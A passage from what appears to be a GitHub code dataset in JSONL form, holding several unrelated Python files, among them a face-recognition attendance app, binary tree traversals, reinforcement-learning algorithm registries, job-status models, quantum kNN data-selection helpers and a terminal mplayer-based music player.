img is None:\r\n print('Wrong path:')\r\n else:\r\n imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\r\n imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\r\n\r\n facesCurFrame = face_recognition.face_locations(imgS)\r\n encodesCurFrame = face_recognition.face_encodings(imgS, facesCurFrame)\r\n\r\n for encodeFace, faceLoc in zip(encodesCurFrame, facesCurFrame):\r\n matches = face_recognition.compare_faces(encodeListKnown, encodeFace)\r\n faceDis = face_recognition.face_distance(encodeListKnown, encodeFace)\r\n print(faceDis)\r\n matchIndex = np.argmin(faceDis)\r\n\r\n if matches[matchIndex]:\r\n name = classNames[matchIndex].upper()\r\n x = name\r\n\r\n y1, x2, y2, x1 = faceLoc\r\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\r\n cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 0), 2)\r\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (255, 0, 0), cv2.FILLED)\r\n mark_attendance(name)\r\n cv2.imshow('webcam', img)\r\n cv2.waitKey(1)\r\n\r\n return render_template('index.html', check=x)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"dinesh-webdesign/attendance-system-","sub_path":"flaskblog.py","file_name":"flaskblog.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70069336483","text":"import unittest\nimport pytest\nfrom dynamic_programming.unique_paths import Solution\n\n\n@pytest.mark.parametrize(\"m,n,expected\", [\n (3, 7, 28),\n (3, 2, 3)\n])\ndef test_unique_paths(m, n, expected):\n assert expected == Solution().unique_paths(m, n)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"sikakente/blind-75","sub_path":"tests/dynamic_programming/test_unique_paths.py","file_name":"test_unique_paths.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26022566498","text":"#This file deals with basic methods for creating,searching and traversals in a binary tree\n\n#class declaration of a node of a Binary Tree\nclass TreeNode:\n def __init__(self,data):\n self.value = data\n self.left = None\n self.right = None\n\n# Pre-order Traversal in a Binary Tree : root,left,right {Iterative approach}\ndef preOrder(root):\n if not root:\n return\n # the output for the preorder traversal\n res = []\n stackList = []\n res.append(root.value)\n stackList.append(root.left)\n stackList.append(root.right)\n while(stackList):\n temp = stackList.pop(0)\n if temp :\n res.append(temp.value)\n stackList.append(temp.left)\n stackList.append(temp.right)\n\n return res\n\n# Pre-order Traversal in a Binary Tree : {Recursive Approach}\ndef preOrderRec(root) :\n if not root:\n return\n print(root.value)\n print(preOrder(root.left))\n print(preOrder(root.right))\n return\n# Post-order Traversal in a Binary Tree : left,right,root {Recursive approach}\ndef postOrder(root):\n if root :\n # the output for the traversal\n outRes = []\n outRes.append(postOrder(root.left))\n outRes.append(postOrder(root.right))\n outRes.append(root.value)\n return outRes\n\n# Creating a basic Binary Tree\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\nroot.right.left = TreeNode(6)\nroot.right.right = TreeNode(7)\n\n# printing the pre-order Traversal\nprint(preOrder(root))\n\n#printing the post-order Traversal\nprint(postOrder(root))\n\n#printing the recursive aoorach for pre-order\nprint(\"The pre-order traversal as follows\")\npreOrderRec(root)\n\n","repo_name":"codingkohli/Algorithms","sub_path":"Binary Tree/BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14489847796","text":"import sys, os\nfrom sb3_contrib import QRDQN, TQC, TRPO\nfrom stable_baselines3 import A2C, DDPG, DQN, PPO, SAC, TD3\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom models import RARL\n\n# ===================================\n# Algorithms available for training\n# and evaluation\n# =================================== \n\nALGOS = {\n \"a2c\": A2C,\n \"ddpg\": DDPG,\n \"dqn\": DQN,\n \"ppo\": PPO,\n \"sac\": SAC,\n \"td3\": TD3,\n # SB3 Contrib,\n \"qrdqn\": QRDQN,\n \"tqc\": TQC,\n \"trpo\": TRPO,\n # Project's Contrib,\n \"rarl\": RARL\n}\n\n# algorithms that can be used as protagonist or adversary\nALGOS_RARL = {\n \"a2c\": A2C,\n \"ddpg\": DDPG,\n \"dqn\": DQN,\n \"ppo\": PPO,\n \"sac\": SAC,\n \"td3\": TD3,\n # SB3 Contrib,\n \"qrdqn\": QRDQN,\n \"tqc\": TQC,\n \"trpo\": TRPO,\n}","repo_name":"PMMon/torch-RARL","sub_path":"models/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"40453466804","text":"\ndef DFS(u, global_visited, g, u_parent, visited_dots):\n visited_dots.append(u)\n global_visited[u] = True\n for neighbour in g[u]:\n if not global_visited[neighbour]:\n DFS(neighbour, global_visited, g, u, visited_dots)\n\nimport sys\nimport threading\n\nsys.setrecursionlimit(10 ** 6)\nthreading.stack_size(10 ** 8)\n\n\ndef run():\n n, m = list(map(int, input().split(' ')))\n\n g = [[] for y in range(n)]\n\n for i in range(m):\n a, b = list(map(int, input().split(' ')))\n g[a-1].append(b-1)\n g[b-1].append(a-1)\n\n global_visited = [False] * n\n g_counts = [0] * n\n i = 0\n while i < n:\n if global_visited[i] == False:\n dots = []\n DFS(i, global_visited, g, -1, dots)\n g_counts[i] = len(dots)\n for dot in dots:\n g_counts[dot] = len(dots)\n i += 1\n\n print(*g_counts)\n\n\nthreading.Thread(target=run).start()","repo_name":"aimedvedeva/Algorithms","sub_path":"DFS/Connected Components.py","file_name":"Connected Components.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18256872748","text":"from copy import deepcopy\nfrom typing import Optional\nfrom datetime import datetime\n\nfrom apistrap.examples import ModelExample, ExamplesMixin\nfrom schematics import Model\nfrom schematics.types import StringType, BooleanType, ModelType, UUIDType, DateTimeType\n\n\nclass ModelModel(Model):\n \"\"\"\n Information about the model used for a job.\n \"\"\"\n name: Optional[str] = StringType(serialize_when_none=True)\n version: Optional[str] = StringType(serialize_when_none=True)\n\n\nclass SheepModel(Model):\n \"\"\"\n Information about a sheep.\n \"\"\"\n running: bool = BooleanType(required=True)\n model: ModelModel = ModelType(ModelModel, required=True)\n request: Optional[str] = UUIDType(serialize_when_none=True)\n\n\nclass ErrorModel(Model):\n \"\"\"\n Information about an error that occurred when processing a job.\n \"\"\"\n message: str = StringType(required=True)\n exception_type: str = StringType(required=False)\n exception_traceback: str = StringType(required=False)\n\n\nclass JobStatus:\n \"\"\"\n Used as an enum class that represents all possible states of a job.\n \"\"\"\n ACCEPTED = \"accepted\"\n QUEUED = \"queued\"\n PROCESSING = \"processing\"\n FAILED = \"failed\"\n DONE = \"done\"\n\n\nclass JobStatusModel(Model, ExamplesMixin):\n \"\"\"\n Status information for a job.\n \"\"\"\n status: JobStatus = StringType(required=True, choices=[*map(\n lambda m: getattr(JobStatus, m),\n filter(str.isupper, dir(JobStatus)))\n ])\n error_details: ErrorModel = ModelType(ErrorModel, required=False, default=None)\n model: ModelModel = ModelType(ModelModel, required=True)\n enqueued_at: datetime = DateTimeType(required=False)\n processing_started_at: datetime = DateTimeType(required=False)\n finished_at: datetime = DateTimeType(required=False)\n\n def copy(self) -> 'JobStatusModel':\n \"\"\"\n Make a deep copy of this object.\n\n :return: a deep copy of this object\n \"\"\"\n return JobStatusModel(deepcopy(self.to_primitive()))\n\n @classmethod\n def get_examples(cls):\n return [\n ModelExample(\"finished\", cls({\n \"status\": \"done\",\n \"model\": {\n \"name\": \"OCR model\",\n \"version\": \"1.0.42\"\n },\n \"enqueued_at\": datetime(2019, 1, 1, 12, 0),\n \"processing_started_at\": datetime(2019, 1, 1, 12, 10),\n \"finished_at\": datetime(2019, 1, 1, 12, 15)\n }), \"A job that finished successfully\"),\n ModelExample(\"pending\", cls({\n \"status\": \"queued\",\n \"model\": {\n \"name\": \"OCR model\",\n \"version\": \"1.0.42\"\n },\n \"enqueued_at\": datetime(2019, 1, 1, 12, 0)\n }), \"A job that waits to be processed\"),\n ModelExample(\"failed\", cls({\n \"status\": \"failed\",\n \"model\": {\n \"name\": \"OCR model\",\n \"version\": \"1.0.42\"\n },\n \"error_details\": {\n \"message\": \"An error occurred\",\n \"exception_type\": \"ValueError\",\n \"exception_traceback\": \"\"\"\n file.py: 23\n file_2.py: 47\n \"\"\"\n },\n \"enqueued_at\": datetime(2019, 1, 1, 12, 0),\n \"processing_started_at\": datetime(2019, 1, 1, 12, 10),\n \"finished_at\": datetime(2019, 1, 1, 12, 15)\n }), \"A job that failed to be processed\", \"Exception details are only included if shepherd was launched in debug mode\"),\n ]\n","repo_name":"iterait/shepherd","sub_path":"shepherd/api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"19779060359","text":"from sklearn.model_selection import train_test_split\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\n\nfrom sklearn.cluster import KMeans\nfrom kmodes.kmodes import KModes\n\nimport pandas as pd\nimport numpy as np\n\nfrom utility.binary_encodings.binary_econding import base_encode\n\n\ndef _transform(X, y, n_features_pca=None, normalize=False, standardize=False, test_size=0.3, enc_type=None, n_bits=0):\n\n X_new = X\n y_new = y\n if n_features_pca != None: \n pca_features = PCA(n_components=n_features_pca)\n X_new = pca_features.fit_transform(X_new)\n\n if standardize:\n scaler = StandardScaler().fit(X_new)\n X_new = scaler.transform(X_new)\n\n if normalize:\n X_new = preprocessing.normalize(X_new, axis=1)\n\n if enc_type != None:\n if n_bits <= 0:\n raise Exception('Invalid Number of n_bits')\n X_new, y_new = base_encode(X_new, y_new, n_features=n_features_pca, n_bits=n_bits, enc_type=enc_type)\n temp_df = pd.DataFrame(data=X_new, index=X.index)\n temp_df['target'] = y_new\n temp_df['target'] = temp_df.groupby([0])['target'].transform(lambda x: pd.Series.mode(x)[0])\n X_new = temp_df[0]\n y_new = temp_df['target']\n\n\n X_new = pd.DataFrame(X_new, index=X.index)\n X_train, X_test, y_train, y_test = train_test_split(X_new, y_new, test_size=test_size, random_state=42, stratify=y)\n return X_train, X_test, y_train, y_test \n\n\n\ndef _normalize(X_train, X_test):\n X_train = preprocessing.normalize(X_train, axis=1)\n X_test = preprocessing.normalize(X_test, axis=1)\n return X_train, X_test\n\ndef _standardize(X_train, X_test):\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n return X_train, X_test\n\ndef _apply_pca(X_train, X_test, n_features_pca):\n pca_features = PCA(n_components=n_features_pca)\n X_train = pd.DataFrame(pca_features.fit_transform(X_train), index=X_train.index)\n X_test = pd.DataFrame(pca_features.fit_transform(X_test), index=X_test.index)\n return X_train, X_test\n\ndef _select_test_sample(X_test, y_test, n_records_per_class=1, random_state=1):\n selected_X_test = []\n selected_y_test = []\n selected_test_indexes = y_test.sample(n=1, random_state=random_state)\n for index, _ in selected_test_indexes.items():\n selected_X_test.append(X_test.loc[index])\n selected_y_test.append(y_test.loc[index])\n return selected_X_test, selected_y_test, selected_test_indexes\n\ndef basis_selection_kmeans(X_train, X_test, y_train, y_test, n_records_per_class=1, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n for cl in df.target.unique():\n groupby_class = df.loc[df['target'] == cl]\n kmodes_on_class = KModes(n_clusters=n_records_per_class, random_state=0)\n kmodes_on_class.fit_predict(groupby_class.drop('target', 1))\n [selected_X_train.append(centroid) for centroid in kmodes_on_class.cluster_centroids_]\n [selected_y_train.append(cl) for i in range(len(kmodes_on_class.cluster_centroids_))]\n\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\n\ndef selection_kmeans(X_train, X_test, y_train, y_test, n_records_per_class=1, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n for cl in df.target.unique():\n groupby_class = df.loc[df['target'] == cl]\n kmeans_on_class = KMeans(n_clusters=n_records_per_class, random_state=0)\n kmeans_on_class.fit(groupby_class.drop('target', 1))\n [selected_X_train.append(centroid) for centroid in kmeans_on_class.cluster_centers_]\n [selected_y_train.append(cl) for i in range(n_records_per_class)]\n\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\ndef basis_selection_mean(X_train, X_test, y_train, y_test, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n if len(discard_index_test):\n X_test.drop(discard_index_test, inplace=True)\n y_test.drop(discard_index_test, inplace=True)\n\n\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n highest_per_class = df.groupby('target')[0].apply(lambda x: x.value_counts().head(1))\n for multi_index,_ in highest_per_class.items():\n elem = multi_index[1]\n row = df[df[0]==elem].head(1)[0]\n row = pd.Series(row.squeeze()) \n target = df[df[0]==elem].head(1)['target']\n selected_X_train.append(np.array([row[0]]))\n selected_y_train.append(target.squeeze())\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\ndef selection_mean(X_train, X_test, y_train, y_test, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n if len(discard_index_test):\n X_test.drop(discard_index_test, inplace=True)\n y_test.drop(discard_index_test, inplace=True)\n\n\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n means = df.groupby('target').mean()\n for target, row in means.iterrows():\n selected_X_train.append(row)\n selected_y_train.append(target)\n\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\n\ndef selection_random(X_train, X_test, y_train, y_test, n_records_per_class=1, random_state_training=1, random_state_test=1, discard_index_train=[], discard_index_test=[]): \n selected_X_train = []\n selected_y_train = []\n if len(discard_index_train):\n X_train.drop(discard_index_train, inplace=True)\n y_train.drop(discard_index_train, inplace=True)\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n selected_train_indexes = y_train.groupby(y_train).sample(n=n_records_per_class, random_state=random_state_training)\n for index, _ in selected_train_indexes.items():\n selected_X_train.append(X_train.loc[index])\n selected_y_train.append(y_train.loc[index])\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_train_indexes.index.values, selected_test_indexes.index.values\n","repo_name":"Brotherhood94/quantum_knn","sub_path":"utility/selections.py","file_name":"selections.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"10046067261","text":"from unittest import mock, TestCase\n\nfrom envisage.api import Application\n\nfrom pyfibre.gui.pyfibre_plugin import PyFibreGUIPlugin\n\nMAIN_TASK = (\"pyfibre.gui.pyfibre_main_task\"\n \".PyFibreMainTask\")\nPLUGIN_SERVICE = 'envisage.api.Plugin.application.get_service'\n\n\ndef mock_return_none(*args, **kwargs):\n return\n\n\nclass TestWfManagerPlugin(TestCase):\n\n def setUp(self):\n self.pyfibre_plugin = PyFibreGUIPlugin()\n self.pyfibre_plugin.application = mock.Mock(spec=Application)\n\n def test_init(self):\n self.assertEqual(1, len(self.pyfibre_plugin.tasks))\n self.assertEqual(\n \"PyFibre GUI (Main)\",\n self.pyfibre_plugin.tasks[0].name,\n )\n","repo_name":"franklongford/PyFibre","sub_path":"pyfibre/gui/tests/test_pyfibre_plugin.py","file_name":"test_pyfibre_plugin.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"25039831426","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set et sw=4 ts=4 ft=python:\n\"\"\"play.py [-h|--help] [-m|--man] [-n|--notags]\n [-s|--sorted] [-e|--exact] [music-dir]\"\"\"\nfrom __future__ import print_function, unicode_literals\nimport mplayer\nimport os\nimport pprint\nimport random\nimport stat\nimport subprocess\nimport sys\nimport time\nimport mutagen\n\nimport qsio\n\n# --- default configuration ------\nDEFAULT_COLLECTION = \"/all/music/\"\n# --- end default configuration --\n\n\ndef usage(code, msg=''):\n if msg:\n print(\"** Error: \", msg)\n print(__doc__)\n # print(__doc__ % globals())\n sys.exit(code)\n\n\ndef help():\n usage(1)\n\n\ndef man():\n print(\"*play* \\tscript to choose subdirectory (artist)\\n\",\n \"\\tand play all music files contained (recursively looked up)\")\n print()\n print(\"[exact]\\tmeans that specified music-dir will be searched for\\n\",\n \"\\tsound files as a whole, no artist-subdir selection will occure\")\n print()\n print(\"[sorted]\\tdisables random shuffling,\\n\",\n \"\\tso songs are always played in the same alphab. sorted order\")\n print()\n help()\n\n\ndef get_opts(args):\n opts = {\n 'help': False,\n 'man': False,\n 'exact': False,\n 'music_dir': '',\n 'sorted': False,\n 'notags': False,\n }\n for opt in args[1:]:\n if opt == '-h' or opt == '--help':\n opts['help'] = True\n elif opt == '-m' or opt == '--man':\n opts['man'] = True\n elif opt == '-e' or opt == '--exact':\n opts['exact'] = True\n elif opt == '-s' or opt == '--sorted':\n opts['sorted'] = True\n elif opt == '-n' or opt == '--notags':\n opts['notags'] = True\n else:\n opts['music_dir'] = opt\n return opts\n\n\ndef sround(num, scale=0):\n try:\n return round(num, scale)\n except TypeError:\n return 0\n\n\ndef un(string):\n return string.decode('utf-8', 'ignore')\n\n\nclass SongInfo(object):\n def __init__(self, songpath, use_tags=True):\n self.path = songpath\n self.filename = os.path.basename(songpath)\n self.title = ''\n self.artist = ''\n self.album = ''\n self.length = None\n self.bitrate = None\n\n self._length_perc = 0\n\n if songpath:\n self._extract_info(songpath, use_tags)\n else:\n self._text = '- not found -'\n return\n\n extra = []\n if self.length:\n # l = u'%ds' % round(self.length)\n # extra.append(l)\n self._length_perc = self.length/100.0\n if self.bitrate:\n bt = self.bitrate\n bt = u'%dkbps' % (bt / 1000)\n extra.append(bt)\n extra_str = (', '.join(extra)) if extra else ''\n\n if not use_tags or not self.title:\n self._text = ('%s [%s]' % (\n self.filename,\n extra_str))\n else:\n self._text = ('%s - %s - %s [%s]' % (\n self.artist,\n self.album,\n self.title,\n extra_str))\n try:\n self._text_for_search = '%s %s' % (\n self.path.lower(),\n self._text.lower())\n except UnicodeDecodeError:\n print('Unable to process %s' % self.path)\n print('text %s' % self._text.lower())\n raise\n\n def __str__(self):\n return self._text\n\n def has_substr(self, substr):\n return substr in self._text_for_search\n\n def percent_pos(self, time_pos, raw=False):\n if time_pos is None:\n return '100'\n p = time_pos / self._length_perc\n if raw:\n return p\n return str(int(round(p)))\n\n def _extract_info(self, songpath, use_tags=True):\n song = mutagen.File(songpath, easy=True)\n if use_tags and getattr(song, 'tags', None):\n self.title = self._extract_field(\n song, ('title', 'TITLE'))\n self.artist = self._extract_field(\n song, ('artist', 'ARTIST'))\n self.album = self._extract_field(\n song, ('album', 'ALBUM', 'ALBUMTITLE'))\n if getattr(song, 'info', None):\n self.length = getattr(song.info, 'length', None)\n self.bitrate = getattr(song.info, 'bitrate', None)\n\n def _extract_field(self, song, field_names, default=''):\n if song.tags is None:\n return default\n for name in field_names:\n default = song.tags.get(name, default)\n if default:\n if isinstance(default, list):\n return default[0]\n return default\n\n\nclass Player(object):\n def __init__(self, music_dir, exact_folder=False, shuffle=True,\n show_tags=True):\n self._no_song = SongInfo('')\n self._player = mplayer.Player(args=('-novideo',),\n stderr=subprocess.STDOUT)\n self.music_dir = music_dir\n self.exact_folder = exact_folder\n self.shuffle = shuffle\n self.show_tags = show_tags\n self.volume_diff = 5\n self._last_vol = None\n self._cols = self._term_cols()\n self._songs = []\n\n self._pick_playlist()\n\n def _pick_playlist(self):\n self._changed = False\n self._last_info = None\n self._searching = None\n self._search_hit = self._no_song\n self._search_changed = False\n\n picked_music_dir = self.music_dir\n if not self.exact_folder:\n picked_music_dir = self._select_artist(picked_music_dir)\n print('\\rSelected directory: %s' % picked_music_dir)\n\n self._songs = self._load_songs(\n self._find_songs(picked_music_dir))\n\n print('\\rTotal %d songs' % len(self._songs))\n\n if self.shuffle:\n random.shuffle(self._songs)\n print('\\rShuffled song list.')\n else:\n self._songs = sorted(self._songs)\n\n def repick_playlist(self):\n print('')\n print('\\r')\n self._pick_playlist()\n self._current = -1\n self._finish_song()\n\n def _find_songs(self, dir_):\n supported = ('mp3', 'ogg', 'flv', 'flac', 'webm', 'mp4')\n songs = []\n dirs = [dir_]\n # print('searching for songs: 0')\n for dir_ in dirs:\n for sub in os.listdir(dir_):\n pathname = os.path.join(dir_, sub.decode('utf-8', 'ignore'))\n mode = os.stat(pathname)[stat.ST_MODE]\n if stat.S_ISDIR(mode):\n dirs.append(pathname)\n elif stat.S_ISREG(mode) and pathname.endswith(supported):\n songs.append(pathname)\n print('\\rfindings songs: {dirs} dirs, {files} files '\n .format(dirs=len(dirs), files=len(songs)),\n end='')\n print('')\n return songs\n\n def _load_songs(self, song_files):\n songs = []\n total = len(song_files)\n for song_file in song_files:\n songs.append(SongInfo(song_file, self.show_tags))\n print('\\rloading songs: {cur}/{total}'\n .format(cur=len(songs), total=total),\n end='')\n print('')\n return songs\n\n def _select_artist(self, dir_):\n subdirs = []\n for sub in os.listdir(dir_):\n pathname = os.path.join(dir_, sub)\n if os.path.isdir(pathname):\n subdirs.append(pathname)\n if not subdirs:\n return ''\n return random.choice(subdirs)\n\n def play(self):\n self._current = 0\n self._play_song()\n\n def _play_song(self):\n key_map = {\n '=': (self.volume_up,),\n '+': (self.volume_up,),\n '-': (self.volume_down,),\n '<': (self.jump_back5,),\n '>': (self.jump_fwd5,),\n 'e': (self.jump_end,),\n 'n': (self.next_song,),\n 'p': (self.prev_song,),\n 'i': (self.print_song_info,),\n 'q': (self.stop,),\n 'r': (self.reset_term,),\n 'P': (self._player.pause,),\n ' ': (self._player.pause,),\n 'l': (self.list_songs,),\n '~': (self.repick_playlist,),\n qsio.NonBlockingKeypress.KEY_INT: (self.stop,),\n }\n with qsio.NonBlockingKeypress(key_map) as keybd:\n keybd.reg_key('/', self._start_search, pass_backref=True)\n keybd.reg_key('h', lambda: self._show_keybindings(keybd))\n\n # whole playlist\n p = self._player\n while self.song and self.song.path:\n print(\"%s\\r\" % (self.song), end='')\n # FIXME(queria|later): ^^ what should be fixed here?\n p.loadfile(self.song.path)\n # wait till file is loaded\n while p.paused is None:\n time.sleep(0.1)\n _ = p.length # noqa\n # restore volume\n if self._last_vol is None:\n self._last_vol = p.volume\n p.volume = self._last_vol\n # play file\n if p.paused:\n p.pause()\n self._report_nowplaying()\n # whole song\n while self._playing_sleep():\n if not keybd.process_keys():\n self.stop()\n break\n self._current += 1\n print('\\r')\n self._clean_nowplaying()\n\n def _playing_sleep(self):\n if self._player.paused:\n time.sleep(0.4)\n else:\n time.sleep(0.1)\n if self._searching is not None:\n if self._search_changed:\n search_msg = 'search: %s => %s (%s)' % (\n self._searching,\n self._search_hit.path,\n self._search_hit)\n search_msg = search_msg.ljust(self._cols - 1)\n # self._search_changed = False\n # FIXME(queria): update has to be done twice\n # doing just one print() is for some reason\n # (not clear to me now) not enough, and screen\n # updated is delayed by one key press\n # - on \"first\" look it's not related to\n # qsio/playing_sleep loop\n # more like to stdout/console update\n # - adding print('x') before this print\n # does not helped!\n print('%s\\r' % search_msg, end='')\n return True\n if self._changed or self._player.percent_pos is None:\n self._changed = False\n return False\n paused = 'PAUSED' if self._player.paused else ''\n msg_format = \"[%d/%d] %s %s%% %s\"\n try:\n msg_data = (\n self._current + 1,\n len(self._songs),\n unicode(self.song),\n self.song.percent_pos(self._player.time_pos),\n paused)\n except UnicodeEncodeError as exc:\n msg_data = (\n self._current + 1,\n len(self._songs),\n str(exc),\n self.song.percent_pos(self._player.time_pos),\n paused)\n msg = msg_format % msg_data\n vol = '[vol=%s%%]' % sround(self._player.volume)\n\n msg_max_len = self._cols - len(vol) - 1\n if len(msg) > msg_max_len:\n msg = msg[:msg_max_len]\n print(\"%s%s\\r\" % (msg.ljust(msg_max_len), vol), end='')\n return True\n\n def _start_search(self, keybd):\n print('\\n')\n self._searching = ''\n keybd.passthrough(self._update_search)\n self._search_changed = True\n\n def _update_search(self, keybd, char):\n if char is None:\n return\n if ord(char) == 13: # enter\n wanted = self._search_hit\n self._stop_search(keybd)\n self.jump_to_name(wanted.path, move_in_queue=True)\n elif ord(char) == 27: # escape\n self._stop_search(keybd)\n else:\n self._search_changed = True\n if ord(char) == 127: # backspace\n self._searching = self._searching[:-1]\n else:\n self._searching += char\n self._searching = self._searching.lower()\n self._search_hit = self._no_song\n for song in self._songs:\n if song.has_substr(self._searching):\n self._search_hit = song\n break\n\n def _stop_search(self, keybd):\n self._search_changed = True\n self._searching = None\n self._search_hit = self._no_song\n keybd.passthrough(None)\n\n def _show_keybindings(self, keybd):\n print('\\r')\n keymap = keybd.dump_keymap()\n for key, actions in keymap.iteritems():\n actions_strs = []\n for action in actions:\n # actions_strs.append(str(dir(action['callback'])))\n if not hasattr(action['callback'], 'im_func'):\n # type(action['callback']) != 'instancemethod':\n continue\n actions_strs.append('%s' % (\n # action['callback'].im_class.__name__,\n action['callback'].im_func.__name__,\n ))\n\n print('\\r \"%s\" => %s' % (\n key,\n ', '.join(actions_strs)\n ))\n print('\\r')\n\n @property\n def song(self):\n try:\n return self._songs[self._current]\n except IndexError:\n # out of songs\n return None\n\n @property\n def songinfo(self, i_know_this_is_deprecated=False):\n if not i_know_this_is_deprecated:\n print('songinfo is deprecated, use just song now'\n ' or pass i_know_this_is_deprecated=True')\n info = self.song\n if not info:\n return self._no_song\n return info\n\n def volume_up(self):\n self._player.volume = min(\n 100,\n self._player.volume + self.volume_diff)\n self._last_vol = self._player.volume\n\n def volume_down(self):\n self._player.volume = max(\n 0,\n self._player.volume - self.volume_diff)\n self._last_vol = self._player.volume\n\n def next_song(self):\n if self._current + 1 == len(self._songs):\n self._current -= 1\n self._finish_song()\n\n def prev_song(self):\n self._current = max(-1, self._current - 2)\n self._finish_song()\n\n def stop(self):\n self._current = len(self._songs)\n self._finish_song()\n\n def jump_to(self, index, move_in_queue=False):\n if index < 0 or index >= len(self._songs):\n print('invalid index')\n return False\n if move_in_queue:\n # move the 'index' song\n # just behing current one\n self._songs.insert(\n self._current + 1,\n self._songs.pop(index))\n else:\n # just jump to position\n # before 'index' song\n self._current = index - 1\n # as finish_song will move one next after current\n self._finish_song()\n return True\n\n def jump_to_name(self, song_name, move_in_queue=False):\n if not song_name:\n return False\n for idx, song in enumerate(self._songs):\n if song_name == song.path:\n return self.jump_to(idx, move_in_queue)\n return False\n\n def jump_end(self):\n try:\n self._player.time_pos = self._player.length - 10\n except TypeError:\n pass # weird float error in mplayer.py?\n\n def jump_time(self, steptime=0, stepcount=1):\n try:\n while stepcount > 0:\n self._player.time_pos = max(\n 0.0, self._player.time_pos + steptime)\n stepcount -= 1\n except TypeError as exc:\n print('Ouch: %s', exc)\n\n def jump_fwd5(self):\n self.jump_time(steptime=5, stepcount=1)\n\n def jump_back5(self):\n self.jump_time(steptime=-5, stepcount=1)\n\n def reset_term(self):\n self._cols = self._term_cols()\n\n def _finish_song(self):\n try:\n self._player.time_pos = self._player.length\n except TypeError:\n pass # weird float error in mplayer.py?\n self._changed = True\n\n def print_song_info(self):\n print('\\r')\n if self._player.metadata:\n md = self._player.metadata\n for k, v in md.iteritems():\n print(' %s: %s\\r' % (k, v))\n if self._player.length is not None:\n print(' length: %s\\r' % self.song.length)\n print(' length_perc: %s\\r' % self.song.percent_pos(1, raw=True))\n print(' current_pos: %s\\r' % self._player.time_pos)\n print('file: %s\\r' % self.song.path)\n\n def list_songs(self, printout=True):\n if not printout:\n return self._songs\n print('')\n print('\\n\\r'.join([\n ('%s (%s)%s' % (\n s.path,\n s,\n ' <================' if s == self.song else ''\n ))\n for s in self._songs]))\n print('\\n\\r', end='')\n\n def _term_cols(self):\n (rows, cols) = subprocess.check_output(['stty', 'size']).split()\n return int(cols)\n\n def _report_nowplaying(self):\n with open(os.path.expanduser('~/.nowplaying'), 'w') as np_file:\n np_file.write(unicode(self.song).encode('utf-8'))\n\n def _clean_nowplaying(self):\n os.remove(os.path.expanduser('~/.nowplaying'))\n\n\ndef main():\n reload(sys)\n sys.setdefaultencoding('utf-8')\n opts = get_opts(sys.argv)\n if opts['help']:\n help()\n if opts['man']:\n man()\n music_dir = opts['music_dir']\n if not music_dir:\n music_dir = DEFAULT_COLLECTION\n if not os.path.isdir(music_dir):\n usage(1, \"Music directory ({}) doesn't exists!\\n\".format(music_dir))\n\n p = Player(\n os.path.abspath(music_dir),\n exact_folder=bool(opts['exact']),\n shuffle=(not bool(opts['sorted'])),\n show_tags=(not bool(opts['notags'])),\n )\n p.play()\n\n\nif __name__ 